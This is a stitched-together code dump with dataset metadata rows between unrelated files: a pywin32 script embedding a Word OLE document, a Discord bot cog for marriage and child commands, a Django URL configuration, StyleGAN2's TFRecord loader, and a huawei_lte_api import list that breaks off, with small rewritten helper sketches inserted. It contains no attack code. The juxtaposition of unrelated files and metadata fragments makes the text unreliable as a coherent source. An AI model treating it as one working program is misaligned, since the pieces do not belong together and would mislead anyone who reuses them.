_public_methods_ = [ 'ReadAt', 'WriteAt', 'Flush', 'SetSize', 'LockRegion', 'UnlockRegion', 'Stat' ]
_com_interfaces_ = [ pythoncom.IID_ILockBytes ]
def __init__(self, data = ""):
self.data = data
now = pywintypes.Time(time.time())
self.ctime = now
self.mtime = now
self.atime = now
def ReadAt(self, offset, cb):
print "ReadAt"
result = self.data[offset:offset + cb]
return result
def WriteAt(self, offset, data):
print "WriteAt " +str(offset)
print "len " + str(len(data))
print "data:"
#print data
if len(self.data) >= offset:
newdata = self.data[0:offset] + data
print len(newdata)
if len(self.data) >= offset + len(data):
newdata = newdata + self.data[offset + len(data):]
print len(newdata)
self.data = newdata
return len(data)
def Flush(self, whatsthis=0):
print "Flush" + str(whatsthis)
fname = os.path.join(win32api.GetTempPath(), "persist.doc")
open(fname, "wb").write(self.data)
return S_OK
def SetSize(self, size):
print "Set Size" + str(size)
if size > len(self.data):
self.data = self.data + "\000" * (size - len(self.data))
else:
self.data = self.data[0:size]
return S_OK
def LockRegion(self, offset, size, locktype):
print "LockRegion"
pass
def UnlockRegion(self, offset, size, locktype):
print "UnlockRegion"
pass
def Stat(self, statflag):
print "returning Stat " + str(statflag)
return (
"PyMemBytes",
storagecon.STGTY_LOCKBYTES,
len(self.data),
self.mtime,
self.ctime,
self.atime,
storagecon.STGM_DIRECT|storagecon.STGM_READWRITE|storagecon.STGM_CREATE ,
storagecon.STGM_SHARE_EXCLUSIVE,
"{00020905-0000-0000-C000-000000000046}",
0, # statebits ?
0
)
class OleClientSite:
_public_methods_ = [ 'SaveObject', 'GetMoniker', 'GetContainer', 'ShowObject', 'OnShowWindow', 'RequestNewObjectLayout' ]
_com_interfaces_ = [ axcontrol.IID_IOleClientSite ]
def __init__(self, data = ""):
self.IPersistStorage = None
self.IStorage = None
def SetIPersistStorage(self, IPersistStorage):
self.IPersistStorage = IPersistStorage
def SetIStorage(self, IStorage):
self.IStorage = IStorage
def SaveObject(self):
print "SaveObject"
if self.IPersistStorage != None and self.IStorage != None:
self.IPersistStorage.Save(self.IStorage,1)
self.IStorage.Commit(0)
return S_OK
def GetMoniker(self, dwAssign, dwWhichMoniker):
print "GetMoniker " + str(dwAssign) + " " + str(dwWhichMoniker)
def GetContainer(self):
print "GetContainer"
def ShowObject(self):
print "ShowObject"
def OnShowWindow(self, fShow):
print "ShowObject" + str(fShow)
def RequestNewObjectLayout(self):
print "RequestNewObjectLayout"
def test():
# create a LockBytes object and
#wrap it as a COM object
# import win32com.server.dispatcher
lbcom = win32com.server.util.wrap(LockBytes(), pythoncom.IID_ILockBytes) #, useDispatcher=win32com.server.dispatcher.DispatcherWin32trace)
# create a structured storage on the ILockBytes object
stcom = pythoncom.StgCreateDocfileOnILockBytes(lbcom, storagecon.STGM_DIRECT| storagecon.STGM_CREATE | storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE, 0)
# create our ClientSite
ocs = OleClientSite()
# wrap it as a COM object
ocscom = win32com.server.util.wrap(ocs, axcontrol.IID_IOleClientSite)
# create a Word OLE Document, connect it to our site and our storage
oocom=axcontrol.OleCreate("{00020906-0000-0000-C000-000000000046}",
axcontrol.IID_IOleObject,
0,
(0,),
ocscom,
stcom,
)
mf=win32ui.GetMainFrame()
hwnd=mf.GetSafeHwnd()
    # Set the host and document name.
    # For some unknown reason the document name becomes the host name and the
    # document name itself is not set; debugged it, but the cause is unclear.
oocom.SetHostNames("OTPython", "This is Cool")
# activate the OLE document
oocom.DoVerb( -1, ocscom, 0, hwnd, mf.GetWindowRect())
# set the hostnames again
oocom.SetHostNames("OTPython2", "ThisisCool2")
# get IDispatch of Word
doc=win32com.client.Dispatch(oocom.QueryInterface(pythoncom.IID_IDispatch))
# get IPersistStorage of Word
dpcom=oocom.QueryInterface(pythoncom.IID_IPersistStorage)
# let our ClientSite know the interfaces
ocs.SetIPersistStorage(dpcom)
ocs.SetIStorage(stcom)
# use IDispatch to do the Office Word test
# pasted from TestOffice.py
wrange = doc.Range()
for i in range(10):
wrange.InsertAfter("Hello from Python %d\n" % i)
paras = doc.Paragraphs
for i in range(len(paras)):
paras[i]().Font.ColorIndex = i+1
paras[i]().Font.Size = 12 + (4 * i)
# XXX - note that
# for para in paras:
# para().Font...
    # doesn't seem to work - no error, it just doesn't work
# Should check if it works for VB!
dpcom.Save(stcom, 0)
dpcom.HandsOffStorage()
# oocom.Close(axcontrol.OLECLOSE_NOSAVE) # or OLECLOSE_SAVEIFDIRTY, but it fails???
#Save the ILockBytes data to "persist2.doc"
lbcom.Flush()
#exiting Winword will automatically update the ILockBytes data
#and flush it to "%TEMP%\persist.doc"
doc.Application.Quit()
if __name__=='__main__':
test()
pythoncom.CoUninitialize()
CheckClean()
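# Minimal, COM-free sketch (assumed class name, not part of pywin32) of the
# byte-splicing behaviour that LockBytes.WriteAt/SetSize above implement; handy
# for checking the offset arithmetic without pythoncom or Word installed.
class MemoryLockBytes:
    def __init__(self, data=b""):
        self.data = data

    def read_at(self, offset, count):
        return self.data[offset:offset + count]

    def write_at(self, offset, payload):
        if offset > len(self.data):
            # pad any gap with NUL bytes, as SetSize does when growing
            self.data += b"\x00" * (offset - len(self.data))
        self.data = self.data[:offset] + payload + self.data[offset + len(payload):]
        return len(payload)

    def set_size(self, size):
        if size > len(self.data):
            self.data += b"\x00" * (size - len(self.data))
        else:
            self.data = self.data[:size]

if __name__ == "__main__":
    lb = MemoryLockBytes(b"hello world")
    lb.write_at(6, b"there")
    assert lb.read_at(0, 11) == b"hello there"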
| 30.165854
| 170
| 0.645052
|
794e2241cfb748c4cff837583b25783cc4587e40
| 14,835
|
py
|
Python
|
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from discord.ext.commands import cooldown
from discord.ext.commands.cooldowns import BucketType
import time
import asyncio
import asyncpg
from datetime import datetime, timezone, timedelta
from utils import errorhandler
from random import randint, choice
heartt = "<:heartt:521071307769774080>"
broken_heartt = "<:brokenheartt:521074570707468308>"
caution = "<:caution:521002590566219776>"
class marriage(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def cog_check(self, ctx):
if await self.bot.pool.fetchrow(
"SELECT user_id FROM user_settings WHERE user_id = $1", ctx.author.id
):
return True
raise (errorhandler.hasUwU(ctx))
    @commands.command(description="Marry your lover.", brief="Marry someone")
async def marry(self, ctx, lover: discord.Member = None):
async with self.bot.pool.acquire() as conn:
if lover is None or lover is ctx.author:
return await ctx.send("Trying to marry yourself...", delete_after=30)
if (
await conn.fetchrow(
"SELECT user_id FROM user_settings WHERE user_id = $1", lover.id
)
is None
):
return await ctx.send(
f"{lover.name} does not have an uwulonian.", delete_after=30
)
if await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1 OR user1_id = $2 OR user2_id = $2",
ctx.author.id,
lover.id,
):
return await ctx.send(
"Either you or the person you are trying to marry is already married...",
delete_after=30,
)
msg = await ctx.send(
f"""{lover.name} would you like to marry {ctx.author.name}. Reply "I do" to marry. Reply "No" to decline the marriage. This will timeout after 30 seconds."""
)
def check(amsg):
return amsg.author == lover
try:
choice = await self.bot.wait_for("message", timeout=30, check=check)
except asyncio.TimeoutError:
return await msg.edit(
content=f"{lover.name} does not want to marry you."
)
if choice.content.lower() == "i do":
await conn.execute(
"INSERT INTO marriages (user1_id,user2_id) VALUES ($1,$2)",
ctx.author.id,
lover.id,
)
await msg.delete()
return await ctx.send(
f"{lover.mention} has accepted {ctx.author.mention}'s proposal {heartt}"
)
if choice.content.lower() == "no":
await msg.delete()
return await ctx.send(
f"{ctx.author.mention} your lover ({lover.mention}) declined your marriage! There's a million fish in the sea though."
)
else:
await msg.edit(
content="Invalid choice. Did you type it properly?", delete_after=30
)
@commands.command(description="Divorce...", brief="Divorce")
async def divorce(self, ctx):
async with self.bot.pool.acquire() as conn:
if (
await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
is None
):
return await ctx.send(
"You can't divorce someone you're not married to.", delete_after=30
)
await self.bot.pool.execute(
"DELETE FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
await self.bot.pool.execute(
"DELETE FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
await ctx.send(broken_heartt)
@commands.command(
description="Check who you are married to", brief="Check who you married"
)
async def marriage(self, ctx):
married = await self.bot.pool.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if married is None:
return await ctx.caution("You are not married.")
if married["user1_id"] == ctx.author.id:
user = self.bot.get_user(married["user2_id"])
else:
user = self.bot.get_user(married["user1_id"])
marriage_time = datetime.now(timezone.utc) - married["time_married"]
await ctx.send(
f"""You have been married to {user.name} since {married['time_married'].strftime("%X at %x")} ({marriage_time.days}d)."""
)
@commands.command(
descritpion="Breed with your lover",
aliases=["sex", "fuck", "<---_that_is_so_funny_hahahahhahahaha"],
brief="Breed",
)
async def breed(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetchval(
"SELECT COUNT(*) FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married")
if children >= 5:
return await ctx.caution(
"You already have 5 children. Are you crazy wanting more?"
)
if marriage["user1_id"] == ctx.author.id:
user = self.bot.get_user(marriage["user2_id"])
else:
user = self.bot.get_user(marriage["user1_id"])
asking = await ctx.send(
f"""{ctx.author.name} would like to breed with {user.name}. {user.name} reply with "I do" for yes and "No" for no."""
)
await self.bot.redis.execute(
"SET",
f"{ctx.author.id}-{ctx.command.qualified_name}",
"cooldown",
"EX",
3600,
)
def check(amsg):
return amsg.author.id == user.id
try:
breed_choice = await self.bot.wait_for(
"message", timeout=30, check=check
)
except asyncio.TimeoutError:
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(
f"{user.name} does not want to make a child with you."
)
if breed_choice.content.lower() == "i do":
if randint(1, 2) == 1:
await asking.delete()
await ctx.send("You didn't successfully make a child.")
else:
gender = choice(["male", "female"])
if gender == "male":
await asking.delete()
congrats = await ctx.send(
"Your efforts were successful! He's a male! Please enter the babies name."
)
else:
await asking.delete()
congrats = await ctx.send(
"Your efforts were successful! She's a female! Please enter the babies name."
)
def check(amsg):
return (
amsg.author.id == ctx.author.id or amsg.author.id == user.id
)
try:
baby_name = await self.bot.wait_for(
"message", timeout=30, check=check
)
except asyncio.TimeoutError:
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(
f"No name was provided in time.", delete_after=30
)
if len(baby_name.content) < 3 or len(baby_name.content) > 50:
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.caution(
"The name must be more then 3 chars long and can't be longer then 50 chars."
)
await self.bot.pool.execute(
"INSERT INTO children (lover1_id, lover2_id, child_name, age, gender) VALUES ($1, $2, $3, $4, $5)",
ctx.author.id,
user.id,
baby_name.content,
0,
gender,
)
await congrats.delete()
await ctx.send(
f"Great name! Good luck with your newborn {baby_name.content}.".replace(
"@", "@\u200b"
)
)
if breed_choice.content.lower() == "no":
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(f"{user.name} does not want to have a child.")
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
await ctx.caution("Invalid choice. Did you type it properly?")
@commands.command(description="Check your family")
async def family(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetch(
"SELECT * FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married")
if marriage["user1_id"] == ctx.author.id:
user = self.bot.get_user(marriage["user2_id"])
else:
user = self.bot.get_user(marriage["user1_id"])
marriage_time = datetime.now(timezone.utc) - marriage["time_married"]
e = discord.Embed(colour=0x7289DA)
e.set_author(name=f"{user.name} is married to {ctx.author.name}")
e.set_footer(
text=f"Married {marriage['time_married'].strftime('%x on %X')} ({marriage_time.days}d)"
)
num = 0
for i in children:
e.add_field(
name=children[num]["child_name"],
value=f"Gender {children[num]['gender']}; Age {children[num]['age']}; Born {children[num]['birthdate'].strftime('%x on %X')}",
)
num += 1
if num == 0:
e.add_field(
name="No children",
value=f"{user.name} and {ctx.author.name} have no children.",
)
await ctx.send(embed=e)
@commands.command(description="Bday!", aliases=["bd", "bday"], hidden=True)
async def birthday(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetchrow(
"SELECT child_name, age, gender, last_bd FROM children WHERE lover1_id = $1 OR lover2_id = $1 ORDER BY RANDOM() LIMIT 1",
ctx.author.id,
)
if children is None:
return await ctx.caution("You have no children.")
user_cooldown = await ctx.bot.redis.pttl(
f"{ctx.author.id}-{ctx.command.qualified_name}-{children['child_name']}"
)
if user_cooldown == -2:
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married.")
await self.bot.redis.execute(
"SET",
f"{ctx.author.id}-{ctx.command.qualified_name}-{children['child_name']}",
"cooldown",
"EX",
2_630_000,
)
gender = "He"
if children["gender"] == "female":
gender = "She"
pre_enjy_msg = await ctx.send(
f"It's {children['child_name']}'s birthday! {gender} will be turning {children['age'] + 1}"
)
enjoyment_lvl = [
f"{children['child_name']} loved the birthday party!",
f"{children['child_name']} didn't enjoy the party.",
f"{children['child_name']} thinks that was the best party ever!",
f"{ctx.author.name} loves uwu",
]
await asyncio.sleep(4)
enjy = choice(enjoyment_lvl)
await pre_enjy_msg.delete()
time = timedelta(seconds=2_630_000) + datetime.utcnow()
await conn.execute(
"UPDATE children SET age = children.age + 1, last_bd = $1 WHERE child_name = $2",
time,
children["child_name"],
)
await ctx.send(enjy)
else:
base_time = user_cooldown
seconds = round(base_time, 2)
hours, remainder = divmod(int(seconds), 3600)
minutes, seconds = divmod(remainder, 60)
await ctx.caution(
f"{children['child_name']} already had there birthday within the last month"
)
def setup(bot):
bot.add_cog(marriage(bot))
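# Redis-free sketch (hypothetical helper, for illustration only) of the keyed
# cooldown pattern used by the breed/birthday commands above: SET key EX seconds,
# DEL key, and a PTTL-style "does the key still exist" check (-2 when it does not).
# Times here are in seconds, whereas Redis PTTL reports milliseconds.
import time

class CooldownStore:
    def __init__(self):
        self._expires = {}  # key -> absolute expiry timestamp

    def set(self, key, seconds):
        self._expires[key] = time.monotonic() + seconds

    def delete(self, key):
        self._expires.pop(key, None)

    def remaining(self, key):
        """Seconds left on the cooldown, or -2 when the key does not exist."""
        expiry = self._expires.get(key)
        if expiry is None:
            return -2
        left = expiry - time.monotonic()
        if left <= 0:
            self.delete(key)
            return -2
        return left

if __name__ == "__main__":
    store = CooldownStore()
    key = "1234-breed"
    store.set(key, 3600)
    print(store.remaining(key) > 0)  # True: the command is still cooling down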
| 41.554622
| 173
| 0.49363
|
794e234301e2e42c8a568c2cfd3640dce94809a7
| 557
|
py
|
Python
|
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'concursinhos.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
#url(r'^$', include('quiz.urls')),
url(r'^quiz/', include('quiz.urls')),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
)
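# Sketch (not taken from this repository) of an equivalent URLconf on modern
# Django (2.x and later), where patterns() and url() no longer exist: path() and
# static() replace them. Assumes the same 'quiz' app and MEDIA settings as above.
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path

urlpatterns = [
    path('quiz/', include('quiz.urls')),
    path('admin/', admin.site.urls),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)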
| 29.315789
| 103
| 0.628366
|
794e240470229cb6a11eb83066b5147fddb11c87
| 10,080
|
py
|
Python
|
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | 4
|
2020-07-16T00:49:03.000Z
|
2021-02-23T23:42:02.000Z
|
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | null | null | null |
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | 1
|
2020-12-09T12:02:04.000Z
|
2020-12-09T12:02:04.000Z
|
# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, visit
# https://nvlabs.github.io/stylegan2/license.html
"""Multi-resolution input data pipeline."""
import os
import glob
import numpy as np
import tensorflow as tf
import dnnlib
import dnnlib.tflib as tflib
#----------------------------------------------------------------------------
# Dataset class that loads data from tfrecords files.
class TFRecordDataset:
def __init__(self,
tfrecord_dir, # Directory containing a collection of tfrecords files.
resolution = None, # Dataset resolution, None = autodetect.
label_file = None, # Relative path of the labels file, None = autodetect.
max_label_size = 0, # 0 = no labels, 'full' = full labels, <int> = N first label components.
max_images = None, # Maximum number of images to use, None = use all images.
repeat = True, # Repeat dataset indefinitely?
shuffle_mb = 4096, # Shuffle data within specified window (megabytes), 0 = disable shuffling.
prefetch_mb = 2048, # Amount of data to prefetch (megabytes), 0 = disable prefetching.
buffer_mb = 256, # Read buffer size (megabytes).
num_threads = 2): # Number of concurrent threads.
self.tfrecord_dir = tfrecord_dir
self.resolution = None
self.resolution_log2 = None
self.shape = [] # [channels, height, width]
self.dtype = 'uint8'
self.dynamic_range = [0, 255]
self.label_file = label_file
self.label_size = None # components
self.label_dtype = None
self._np_labels = None
self._tf_minibatch_in = None
self._tf_labels_var = None
self._tf_labels_dataset = None
self._tf_datasets = dict()
self._tf_iterator = None
self._tf_init_ops = dict()
self._tf_minibatch_np = None
self._cur_minibatch = -1
self._cur_lod = -1
# List tfrecords files and inspect their shapes.
assert os.path.isdir(self.tfrecord_dir)
tfr_files = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.tfrecords')))
assert len(tfr_files) >= 1
tfr_shapes = []
for tfr_file in tfr_files:
tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE)
for record in tf.python_io.tf_record_iterator(tfr_file, tfr_opt):
tfr_shapes.append(self.parse_tfrecord_np(record).shape)
break
# Autodetect label filename.
if self.label_file is None:
guess = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.labels')))
if len(guess):
self.label_file = guess[0]
elif not os.path.isfile(self.label_file):
guess = os.path.join(self.tfrecord_dir, self.label_file)
if os.path.isfile(guess):
self.label_file = guess
# Determine shape and resolution.
max_shape = max(tfr_shapes, key=np.prod)
self.resolution = resolution if resolution is not None else max_shape[1]
self.resolution_log2 = int(np.log2(self.resolution))
self.shape = [max_shape[0], self.resolution, self.resolution]
tfr_lods = [self.resolution_log2 - int(np.log2(shape[1])) for shape in tfr_shapes]
assert all(shape[0] == max_shape[0] for shape in tfr_shapes)
assert all(shape[1] == shape[2] for shape in tfr_shapes)
assert all(shape[1] == self.resolution // (2**lod) for shape, lod in zip(tfr_shapes, tfr_lods))
assert all(lod in tfr_lods for lod in range(self.resolution_log2 - 1))
# Load labels.
assert max_label_size == 'full' or max_label_size >= 0
self._np_labels = np.zeros([1<<30, 0], dtype=np.float32)
if self.label_file is not None and max_label_size != 0:
self._np_labels = np.load(self.label_file)
assert self._np_labels.ndim == 2
if max_label_size != 'full' and self._np_labels.shape[1] > max_label_size:
self._np_labels = self._np_labels[:, :max_label_size]
if max_images is not None and self._np_labels.shape[0] > max_images:
self._np_labels = self._np_labels[:max_images]
self.label_size = self._np_labels.shape[1]
self.label_dtype = self._np_labels.dtype.name
# Build TF expressions.
with tf.name_scope('Dataset'), tf.device('/cpu:0'):
self._tf_minibatch_in = tf.placeholder(tf.int64, name='minibatch_in', shape=[])
self._tf_labels_var = tflib.create_var_with_large_initial_value(self._np_labels, name='labels_var')
self._tf_labels_dataset = tf.data.Dataset.from_tensor_slices(self._tf_labels_var)
for tfr_file, tfr_shape, tfr_lod in zip(tfr_files, tfr_shapes, tfr_lods):
if tfr_lod < 0:
continue
dset = tf.data.TFRecordDataset(tfr_file, compression_type='', buffer_size=buffer_mb<<20)
if max_images is not None:
dset = dset.take(max_images)
dset = dset.map(self.parse_tfrecord_tf, num_parallel_calls=num_threads)
dset = tf.data.Dataset.zip((dset, self._tf_labels_dataset))
bytes_per_item = np.prod(tfr_shape) * np.dtype(self.dtype).itemsize
if shuffle_mb > 0:
dset = dset.shuffle(((shuffle_mb << 20) - 1) // bytes_per_item + 1)
if repeat:
dset = dset.repeat()
if prefetch_mb > 0:
dset = dset.prefetch(((prefetch_mb << 20) - 1) // bytes_per_item + 1)
dset = dset.batch(self._tf_minibatch_in)
self._tf_datasets[tfr_lod] = dset
self._tf_iterator = tf.data.Iterator.from_structure(self._tf_datasets[0].output_types, self._tf_datasets[0].output_shapes)
self._tf_init_ops = {lod: self._tf_iterator.make_initializer(dset) for lod, dset in self._tf_datasets.items()}
def close(self):
pass
# Use the given minibatch size and level-of-detail for the data returned by get_minibatch_tf().
def configure(self, minibatch_size, lod=0):
lod = int(np.floor(lod))
assert minibatch_size >= 1 and lod in self._tf_datasets
if self._cur_minibatch != minibatch_size or self._cur_lod != lod:
self._tf_init_ops[lod].run({self._tf_minibatch_in: minibatch_size})
self._cur_minibatch = minibatch_size
self._cur_lod = lod
# Get next minibatch as TensorFlow expressions.
def get_minibatch_tf(self): # => images, labels
return self._tf_iterator.get_next()
# Get next minibatch as NumPy arrays.
def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels
self.configure(minibatch_size, lod)
with tf.name_scope('Dataset'):
if self._tf_minibatch_np is None:
self._tf_minibatch_np = self.get_minibatch_tf()
return tflib.run(self._tf_minibatch_np)
# Get random labels as TensorFlow expression.
def get_random_labels_tf(self, minibatch_size): # => labels
with tf.name_scope('Dataset'):
if self.label_size > 0:
with tf.device('/cpu:0'):
return tf.gather(self._tf_labels_var, tf.random_uniform([minibatch_size], 0, self._np_labels.shape[0], dtype=tf.int32))
return tf.zeros([minibatch_size, 0], self.label_dtype)
# Get random labels as NumPy array.
def get_random_labels_np(self, minibatch_size): # => labels
if self.label_size > 0:
return self._np_labels[np.random.randint(self._np_labels.shape[0], size=[minibatch_size])]
return np.zeros([minibatch_size, 0], self.label_dtype)
# Parse individual image from a tfrecords file into TensorFlow expression.
@staticmethod
def parse_tfrecord_tf(record):
features = tf.parse_single_example(record, features={
'shape': tf.FixedLenFeature([3], tf.int64),
'data': tf.FixedLenFeature([], tf.string)})
data = tf.decode_raw(features['data'], tf.uint8)
return tf.reshape(data, features['shape'])
# Parse individual image from a tfrecords file into NumPy array.
@staticmethod
def parse_tfrecord_np(record):
ex = tf.train.Example()
ex.ParseFromString(record)
shape = ex.features.feature['shape'].int64_list.value # pylint: disable=no-member
data = ex.features.feature['data'].bytes_list.value[0] # pylint: disable=no-member
return np.fromstring(data, np.uint8).reshape(shape)
#----------------------------------------------------------------------------
# Helper func for constructing a dataset object using the given options.
def load_dataset(class_name=None, data_dir=None, verbose=False, **kwargs):
kwargs = dict(kwargs)
if 'tfrecord_dir' in kwargs:
if class_name is None:
class_name = __name__ + '.TFRecordDataset'
if data_dir is not None:
kwargs['tfrecord_dir'] = os.path.join(data_dir, kwargs['tfrecord_dir'])
assert class_name is not None
if verbose:
print('Streaming data using %s...' % class_name)
dataset = dnnlib.util.get_obj_by_name(class_name)(**kwargs)
if verbose:
print('Dataset shape =', np.int32(dataset.shape).tolist())
print('Dynamic range =', dataset.dynamic_range)
print('Label size =', dataset.label_size)
return dataset
#----------------------------------------------------------------------------
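# Standalone check (assumed helper, not part of StyleGAN2) of the megabytes-to-items
# conversion used above for the shuffle and prefetch buffers:
# ((mb << 20) - 1) // bytes_per_item + 1 is a ceiling division on raw byte counts.
import numpy as np

def buffer_items(megabytes, shape, dtype='uint8'):
    bytes_per_item = int(np.prod(shape)) * np.dtype(dtype).itemsize
    return ((megabytes << 20) - 1) // bytes_per_item + 1

if __name__ == '__main__':
    # e.g. 3x256x256 uint8 images (196608 bytes each) with a 4096 MB shuffle window
    print(buffer_items(4096, (3, 256, 256)))  # 21846 items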
| 50.4
| 140
| 0.605456
|
794e2422dd9cf0c29d4aa32ecdaed24ce4872b12
| 6,276
|
py
|
Python
|
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | null | null | null |
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | 1
|
2020-06-21T20:35:27.000Z
|
2020-07-14T20:08:55.000Z
|
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | 3
|
2020-02-27T11:35:55.000Z
|
2021-03-25T08:51:51.000Z
|
from huawei_lte_api.Connection import Connection
from huawei_lte_api.api.Device import Device
from huawei_lte_api.api.User import User
from huawei_lte_api.api.Monitoring import Monitoring
from huawei_lte_api.api.Security import Security
from huawei_lte_api.api.WebServer import WebServer
from huawei_lte_api.api.WLan import WLan
from huawei_lte_api.api.Cradle import Cradle
from huawei_lte_api.api.Pin import Pin
from huawei_lte_api.config.DialUp import DialUp as DialUpConfig
from huawei_lte_api.config.Global import Global
from huawei_lte_api.config.Lan import Lan as LanConfig
from huawei_lte_api.config.Network import Network as NetworkConfig
from huawei_lte_api.config.Pincode import Pincode as PincodeConfig
from huawei_lte_api.config.Sms import Sms as SmsConfig
from huawei_lte_api.config.Voice import Voice
from huawei_lte_api.config.Wifi import Wifi as WifiConfig
from huawei_lte_api.config.PcAssistant import PcAssistant
from huawei_lte_api.config.DeviceInformation import DeviceInformation
from huawei_lte_api.config.WebUICfg import WebUICfg
from huawei_lte_api.config.Device import Device as DeviceConfig
from huawei_lte_api.config.FastBoot import FastBoot
from huawei_lte_api.config.Firewall import Firewall
from huawei_lte_api.config.IPv6 import IPv6
from huawei_lte_api.config.Ota import Ota as OtaConfig
from huawei_lte_api.config.Pb import Pb as PbConfig
from huawei_lte_api.config.Sntp import Sntp
from huawei_lte_api.config.Statistic import Statistic as ConfigStatistic
from huawei_lte_api.config.Stk import Stk
from huawei_lte_api.config.Update import Update
from huawei_lte_api.config.UPnp import UPnp
from huawei_lte_api.config.Ussd import Ussd
from huawei_lte_api.config.WebSd import WebSd
from huawei_lte_api.usermanual.PublicSysResources import PublicSysResources
from huawei_lte_api.api.Ota import Ota
from huawei_lte_api.api.Net import Net
from huawei_lte_api.api.DialUp import DialUp
from huawei_lte_api.api.Sms import Sms
from huawei_lte_api.api.Redirection import Redirection
from huawei_lte_api.api.VSim import VSim
from huawei_lte_api.api.FileManager import FileManager
from huawei_lte_api.api.Dhcp import Dhcp
from huawei_lte_api.api.DDns import DDns
from huawei_lte_api.api.Diagnosis import Diagnosis
from huawei_lte_api.api.SNtp import SNtp
from huawei_lte_api.api.OnlineUpdate import OnlineUpdate
from huawei_lte_api.api.Log import Log
from huawei_lte_api.api.Time import Time
from huawei_lte_api.api.SdCard import SdCard
from huawei_lte_api.api.UsbStorage import UsbStorage
from huawei_lte_api.api.UsbPrinter import UsbPrinter
from huawei_lte_api.api.Vpn import Vpn
from huawei_lte_api.api.Ntwk import Ntwk
from huawei_lte_api.api.Global import Global as Global_
from huawei_lte_api.api.Pb import Pb
from huawei_lte_api.api.Host import Host
from huawei_lte_api.api.Language import Language
from huawei_lte_api.api.Syslog import Syslog
from huawei_lte_api.api.Voice import Voice as Voice_
from huawei_lte_api.api.Cwmp import Cwmp
from huawei_lte_api.api.Lan import Lan
from huawei_lte_api.api.Led import Led
from huawei_lte_api.api.Statistic import Statistic
from huawei_lte_api.api.TimeRule import TimeRule
from huawei_lte_api.api.Bluetooth import Bluetooth
